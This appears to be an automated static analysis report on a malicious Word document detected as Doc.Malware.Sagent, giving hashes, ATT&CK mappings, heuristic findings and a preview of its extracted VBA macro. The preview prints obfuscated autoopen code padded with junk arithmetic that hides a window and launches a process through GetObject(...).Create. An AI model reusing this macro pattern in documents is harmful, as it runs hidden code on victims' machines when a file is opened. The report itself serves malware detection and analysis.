Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b6cdaaca89cd1d62…

MALICIOUS

Office (OLE)

Size: 148.6 KB
Created: 2019-03-20 08:30:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 18aeef773ed5890a3ae4d4424c2c7deb
SHA-1: 4b58dc54bf66af0cb4c11fc4050a0056f84d6ab0
SHA-256: b6cdaaca89cd1d627d2f5c9ee93d8d5ac2166e64e968f7bcd33d074ccb352fc9
Risk Score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample contains legacy WordBasic auto-exec markers and a VBA AutoOpen macro that uses the GetObject function, indicating a malicious document designed to execute a payload. The ClamAV detection name further supports its malicious nature. No specific family could be identified.

Heuristics 7

  • ClamAV: Doc.Malware.Sagent-6902288-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Sagent-6902288-0
  • VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS)
    The document contains VBA macro code.
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro, which runs automatically when the document is opened.
  • GetObject call (high; OLE_VBA_GETOBJ)
    The macro code calls GetObject.
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents, or documents whose source extraction failed, where no visible macro source is available.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14538 bytes
SHA-256: 371ea7f9b110ac7ea13d3c8c243730b6e649c68afb39bffef3e37c8daa8332eb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "zBBAAw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tAZQ_B"
Attribute VB_Base = "0{635A0618-116F-42DC-81B5-3D0498827A3E}{EC4DE146-1DC1-4C0D-81EE-DAD1FE0514C1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "nUQUBD"
Sub autoopen()
On Error Resume Next
   If HBAw_Q4A = TGABUoUA Then
      dcABAAx = 720773148 * Hex(573673709) / 60407271 + Sqr(978585091) * 916843779 / CInt(945231407) * (882288782 * 418057296)
      BACwAU = (866185332 - Chr(lAGBQ_) / HAkA1BZ / 881700869 + z_ABAU / Fix(554426551 + Log(KkU1B4A * Sgn(914323785) + l1Zo_A / CSng(254300688))))
End If
   If wD_QBU = S1UAkA Then
      TDocAXU = 99659485 * Hex(20058333) / 739469662 + Sqr(932776801) * 553076985 / CInt(159002522) * (844528018 * 806634912)
      nGGABwA = (652722581 - Chr(UxQDwCQ) / VkAQDU / 529044965 + jCZ_ADD / Fix(654645913 + Log(bBBAUA * Sgn(307111307) + iU44wZ / CSng(869714904))))
End If
   If vABxAcXA = AADUZcA Then
      BD_4DAUc = 236890668 * Hex(281483848) / 980791537 + Sqr(484035143) * 132576297 / CInt(161533978) * (334443729 * 615884484)
      PAAAAQA = (555775054 - Chr(pD1AAC) / WAQBocC / 778485193 + toAQGDAk / Fix(489830330 + Log(zQZDwX * Sgn(165771220) + WXQcXD / CSng(836112643))))
End If
Set wCGxUxB = GetObject(tAZQ_B.UAABUZA)
   If vwAxAk = fCxDcA Then
      txAZAA = 680722426 * Hex(831329719) / 788319246 + Sqr(210643544) * 629989943 / CInt(942570148) * (30160108 * 125474389)
      zBBoGXA = (583751228 - Chr(QA_AC1) / NABkxB / 545360112 + C_AA_D / Fix(466911424 + Log(zQAUBBw * Sgn(946967472) + TDAAAA / CSng(858360468))))
End If
   If YAA_k1C_ = GwDGUC Then
      XACAAUAA = 79920443 * Hex(188534406) / 647757044 + Sqr(538919117) * 341250610 / CInt(615846956) * (335755752 * 273911447)
      Gc4AQZ = (969397979 - Chr(IcABAAAA) / KQAA1w / 756045161 + tZoAAU / Fix(833120137 + Log(BA_1AA * Sgn(879168603) + jZ1AAU / CSng(262616047))))
End If
wCGxUxB.ShowWindow = 667434 - 667434
   If wZxBxA = uwD4Uxc Then
      RoQ1UA = 935210567 * Hex(786963101) / 962829557 + Sqr(656993655) * 188174667 / CInt(467828876) * (245010151 * 755906919)
      pwBcAAB_ = (960241938 - Chr(bDQ_AA) / ZCcwoDAA / 991163281 + h_AQoA / Fix(153933426 + Log(bxAAx_ * Sgn(406673217) + KxGAQDA / CSng(807236495))))
End If
   If LAADwww = WBBAkCU Then
      GwAQCBw = 84963699 * Hex(866927520) / 191231961 + Sqr(327337088) * 19461144 / CInt(582692977) * (954043387 * 10320805)
      f4DQAAA = (746725079 - Chr(lXQGAB) / iCUU1B / 122067907 + kDB4AX / Fix(477149810 + Log(LBA_oQ * Sgn(953599257) + tAZG_CC / CSng(428401662))))
End If
   If vXx_XAZ = tUUAADw Then
      dUDADBAA = 930209051 * Hex(82527598) / 907534685 + Sqr(451648126) * 324177419 / CInt(149392085) * (49429930 * 756405424)
      qCAAkUA = (278038076 - Chr(ZUCUBwDX) / rAGUcA / 570098903 + dAoUAUB / Fix(294503861 + Log(wcDAD1Q * Sgn(138655485) + GABUQUAA / CSng(226354254))))
End If
GetObject(tAZQ_B.FCUAXBA). _
Create# jUBUAxkx + tAZQ_B.NU_cwDA4 + kBDXAABk + tAZQ_B.IxocAABX + DXAQ_A + tAZQ_B.BABDDQDD + n1AwAA, iUGQxZo, wCGxUxB, NA4cAUk
   If HXAAAUAA = GoxAQA1 Then
      LA1AXo = 344603657 * Hex(604161073) / 857313564 + Sqr(266471008) * 511869992 / CInt(77334159) * (770356485 * 269241467)
      JUAkD1G = (83109844 - Chr(XA_kGA) / XcooCAAD / 56842516 + RDADQDD / Fix(219749515 + Log(wkX_AAQA * Sgn(720521005) + LxAGZ1 / CSng(731589832))))
End If
   If O4AAoBAx = RAAxC4A Then
      MA_BAcA = 149530676 * Hex(930368712) / 950885847 + Sqr(248529490) * 847847449 / CInt(435290086) * (251116524 * 775834819)
      fABAXAAC = (977898552 - Chr(mUCGxUc) / mZAAAkAA / 814876213 + BCcxcAAA / Fix(515372193 + Log(RAAUwxBB * Sgn(734246969) + LXkAAA / CSng(84019171))))
End If
   
... (truncated)